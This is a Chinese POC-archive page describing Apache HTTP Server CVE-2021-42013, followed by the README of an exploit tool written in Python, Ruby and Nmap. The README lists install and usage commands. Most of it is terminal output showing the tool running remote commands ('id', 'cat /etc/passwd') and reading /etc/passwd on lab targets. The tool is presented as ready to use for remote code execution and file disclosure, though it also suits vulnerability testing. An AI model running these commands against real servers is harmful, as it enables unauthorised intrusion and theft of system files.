关联漏洞
标题:
Apache HTTP Server 安全漏洞
(CVE-2021-42013)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在安全漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别
描述
These Nmap, Python and Ruby scripts detects and exploits CVE-2021-42013 with RCE and local file disclosure.
介绍
# CVE-2021-42013
## Description
This script exploits CVE-2021-42013 to print file or/and execute command.
This script is available for:
- Nmap
- Python
- Ruby
## Requirements
### Python
- python3
- python3 Standard Library
### Ruby
- Ruby
- Ruby Standard Library
### Install
```bash
git clone https://github.com/mauricelambert/CVE-2021-42013.git
cd CVE-2021-42013
# Python
pip install -r requirements.txt
```
### Usages
```bash
# Python
python3 CVE202142013.py [(-f/--file FILE|-c/--commands COMMAND1 COMMAND2 ...) -s/--ssl -o/--output FILE target]
# Nmap
nmap -p 80 --script RCE_CVE2021_41773 [--script-args "file=<file>" "command=<command>"] <target>
# Ruby
ruby CVE-2021-41773.rb [(-f/--file FILE|-c/--commands "COMMAND1;COMMAND2;...") -o/--output FILE target]
```
## Examples
### Python
```text
~# python3 CVE202142013.py 127.0.0.1:80
CVE-2021-42013 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[-] Target is not vulnerable.
~# python3 CVE202142013.py 172.17.0.2
CVE-2021-42013 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
~# python3 CVE202142013.py -c "id" "echo H4CK" -c "cat /etc/passwd" -u "/" 172.17.0.2
CVE-2021-42013 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
H4CK
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~# python3 CVE202142013.py -f "/etc/passwd" -o out.txt 172.17.0.2
CVE-2021-42013 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
~# cat out.txt
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~# python3 CVE202142013.py -u "error" -f "/do/not/exists" 172.17.0.2
CVE-2021-42013 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
[-] Exploit is not working (HTTP error 403).
~# python3 CVE202142013.py -f "/do/not/exists" 172.17.0.2
CVE-2021-42013 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
PythonToolsKit Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
[-] Exploit is not working (HTTP error 404).
~#
```
### Ruby
```text
~# ruby CVE-2021-41773.rb 127.0.0.1
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target: 127.0.0.1 is vulnerable
~# ruby CVE-2021-41773.rb -c "id; echo abc" 127.0.0.1
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
[+] Target is vulnerable.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
abc
~# ruby CVE-2021-41773.rb -f "/etc/passwd" -o abc.txt
CVE-2021-41773 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
Host (target): 127.0.0.1
[+] Target is vulnerable.
~# cat abc.txt
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~#
```
### Nmap
```text
~# nmap -p 80 --script RCE_CVE2021_42013 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:39 CET
NSE: Web service is up. Send payload...
NSE: Mode: detect only. No exploit.
NSE: Target is vulnerable.
Nmap scan report for 172.17.0.2
Host is up (0.00015s latency).
PORT STATE SERVICE
80/tcp open http
| RCE_CVE2021_42013:
| CVE-2021-42013:
| title: Apache CVE-2021-42013 RCE
| state: VULNERABLE (Exploitable)
| ids:
| CVE:CVE-2021-42013
| description:
| The Apache Web Server contains a RCE vulnerability. This
| script detects and exploits this vulnerability with RCE
| attack (execute commands) and local file disclosure.
| dates:
| disclosure:
| year: 2021
| day: 06
| month: 10
| disclosure: 2021-10-06
| refs:
| https://nvd.nist.gov/vuln/detail/CVE-2021-42013
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
|_ https://github.com/mauricelambert/CVE-2021-42013
Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
~# nmap -p 80 --script RCE_CVE2021_42013 --script-args "file=/etc/passwd" 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:38 CET
NSE: Web service is up. Send payload...
NSE: Mode: exploit local file disclosure
NSE: Target is vulnerable.
NSE: Exploit is working.
Nmap scan report for 172.17.0.2
Host is up (0.00017s latency).
PORT STATE SERVICE
80/tcp open http
| RCE_CVE2021_42013:
| CVE-2021-42013:
| title: Apache CVE-2021-42013 RCE
| state: VULNERABLE (Exploitable)
| ids:
| CVE:CVE-2021-42013
| description:
| The Apache Web Server contains a RCE vulnerability. This
| script detects and exploits this vulnerability with RCE
| attack (execute commands) and local file disclosure.
| dates:
| disclosure:
| month: 10
| year: 2021
| day: 06
| disclosure: 2021-10-06
| refs:
| https://github.com/mauricelambert/CVE-2021-42013
| https://nvd.nist.gov/vuln/detail/CVE-2021-42013
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
| exploit output:
|
| root:x:0:0:root:/root:/bin/bash
| www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|_
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
~# nmap -p 80 --script RCE_CVE2021_42013 --script-args "command=id" 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:32 CET
NSE: Web service is up. Send payload...
NSE: Mode: exploit RCE
NSE: Target is vulnerable.
NSE: Exploit is working.
Nmap scan report for 172.17.0.2
Host is up (0.00087s latency).
PORT STATE SERVICE
80/tcp open http
| RCE_CVE2021_42013:
| CVE-2021-42013:
| title: Apache CVE-2021-42013 RCE
| state: VULNERABLE (Exploitable)
| ids:
| CVE:CVE-2021-42013
| description:
| The Apache Web Server contains a RCE vulnerability. This
| script detects and exploits this vulnerability with RCE
| attack (execute commands) and local file disclosure.
| dates:
| disclosure:
| day: 06
| year: 2021
| month: 10
| disclosure: 2021-10-06
| refs:
| https://nvd.nist.gov/vuln/detail/CVE-2021-42013
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
| https://github.com/mauricelambert/CVE-2021-42013
| exploit output:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|_
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
~#
```
## Exit codes
- 0: Target is vulnerable
- 1: Target is not vulnerable
- 127: State unknown
## Links
- [nvd](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
- [Pydoc and examples](https://mauricelambert.github.io/info/python/security/CVE202142013.html)
- [Rdoc](https://mauricelambert.github.io/info/ruby/security/CVE-2021-41773/CVE202141773.html)
- [Payload and docker environment](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
## Licence
Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
文件快照
[4.0K] /data/pocs/12648716ec0fd646ba87dd8571ffa23869a95025
├── [9.1K] apache_rce_cve2021_42013.md
├── [ 12K] apache_rce_cve2021_42013.rb
├── [8.8K] CVE202142013.py
├── [5.1K] CVE-2021-42013.rb
├── [ 35K] LICENSE.txt
├── [7.8K] RCE_CVE2021_42013.nse
├── [9.2K] README.md
└── [ 15] requirements.txt
0 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。